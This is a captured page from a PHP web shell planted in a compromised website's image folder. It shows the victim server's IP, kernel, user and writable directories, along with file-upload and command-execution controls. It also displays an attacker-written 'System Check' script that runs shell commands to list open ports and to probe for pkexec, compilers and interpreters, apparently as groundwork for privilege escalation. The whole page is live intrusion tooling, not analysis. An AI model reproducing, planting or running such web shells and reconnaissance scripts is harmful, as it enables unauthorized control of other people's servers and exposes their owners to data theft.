403Webshell
Server IP : 103.119.228.120  /  Your IP : 18.188.68.115
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/hendraso/public_html/Assets/img/gambar_laskcamc/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/hendraso/public_html/Assets/img/gambar_laskcamc/check.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>System Check</title>
    <style>
        body {
            font-family: 'Courier New', Courier, monospace;
            background-color: #1e1e1e;
            color: #00FF00;
            padding: 20px;
            margin: 0;
            position: relative;
            min-height: 100vh;
            font-size: 14px;
        }
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
            background-color: #2e2e2e;
            border-radius: 8px;
        }
        .info {
            display: grid;
            grid-template-columns: 1fr 1fr 1fr;
            gap: 20px;
            padding: 10px 0;
            margin-bottom: 20px;
        }
        .info div {
            padding: 15px;
            background-color: #3e3e3e;
            border: 2px solid #00FF00;
            border-radius: 8px;
        }
        .result {
            margin-top: 20px;
            padding: 15px;
            background-color: #3e3e3e;
            border-left: 5px solid #00FF00;
            border-radius: 8px;
        }
        .active {
            border-left-color: #00FF00;
        }
        .not-active {
            border-left-color: #FF0000;
        }
        footer {
            position: absolute;
            bottom: 0;
            width: 100%;
            text-align: center;
            padding: 10px 0;
            background-color: #2e2e2e;
            color: #00FF00;
            font-size: 0.9em;
            border-top: 2px solid #00FF00;
        }
        h1 {
            color: #00FF00;
            font-size: 24px;
            margin-bottom: 20px;
        }
        .command-output {
            font-family: monospace;
            background-color: #111;
            padding: 10px;
            border-radius: 4px;
            overflow-x: auto;
        }
    </style>
</head>
<body>

    <div class="container">
        <?php
        function getServerIP() {
            return $_SERVER['SERVER_ADDR'];
        }

        function getOpenPorts() {
            $output = shell_exec('netstat -tuln | grep LISTEN');
            return nl2br(htmlspecialchars($output));
        }

        function getOS() {
            return php_uname();
        }
        ?>

        <div class="info">
            <div>
                <strong>Server IP:</strong><br>
                <?php echo getServerIP(); ?>
            </div>
            <div>
                <strong>Open Ports:</strong><br>
                <div class="command-output"><?php echo getOpenPorts(); ?></div>
            </div>
            <div>
                <strong>Operating System:</strong><br>
                <?php echo getOS(); ?>
            </div>
        </div>

        <h1>System Status Check</h1>

        <?php
        function checkCommand($command) {
            if (function_exists('system')) {
                ob_start();
                system($command . " 2>&1", $status);
                $output = ob_get_clean();

                if ($status === 0) {
                    echo "<div class='result active'><strong>" . htmlspecialchars($command) . "</strong> is available and active.<br>Output: <div class='command-output'>" . nl2br(htmlspecialchars($output)) . "</div></div>";
                } else {
                    echo "<div class='result not-active'><strong>" . htmlspecialchars($command) . "</strong> is not available or there was an error.<br>Output: <div class='command-output'>" . nl2br(htmlspecialchars($output)) . "</div></div>";
                }
            } else {
                echo "<div class='result not-active'>The system function is disabled.</div>";
            }
        }

        function checkSystemFunction() {
            if (function_exists('system')) {
                echo "<div class='result active'>The system function is enabled and active.</div>";
            } else {
                echo "<div class='result not-active'>The system function is disabled.</div>";
            }
        }

        checkSystemFunction();
        checkCommand("pkexec --version");
        checkCommand("python --version");
        checkCommand("gcc --version");
        checkCommand("perl -v");
        checkCommand("node --version");
        checkCommand("npm --version");
        checkCommand("ruby --version");
        checkCommand("java -version");
        checkCommand("php -v");
        checkCommand("apache2 -v");
        checkCommand("nginx -v");
        checkCommand("mysql --version");
        checkCommand("psql --version");
        checkCommand("docker --version");
        checkCommand("git --version");
        checkCommand("composer --version");
        checkCommand("curl --version");
        checkCommand("wget --version");
        ?>

        <footer>
            X aka Mkz
        </footer>
    </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit